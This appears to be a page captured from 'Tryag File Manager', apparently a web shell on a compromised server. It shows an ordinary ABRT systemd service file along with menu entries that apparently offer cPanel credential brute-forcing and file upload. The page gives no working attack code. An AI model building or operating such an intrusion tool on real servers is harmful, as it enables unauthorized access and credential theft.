Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
lib
/
systemd
/
system
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//lib/systemd/system/abrt-oops.service
[Unit] Description=ABRT kernel log watcher After=abrtd.service Requisite=abrtd.service [Service] # TODO: do we really need absolute paths here? ExecStart=/bin/sh -c '/bin/dmesg | /usr/bin/abrt-dump-oops -xD; exec /usr/bin/abrt-watch-log -F "`/usr/bin/abrt-dump-oops -m`" /var/log/messages -- /usr/bin/abrt-dump-oops -xtD' [Install] WantedBy=multi-user.target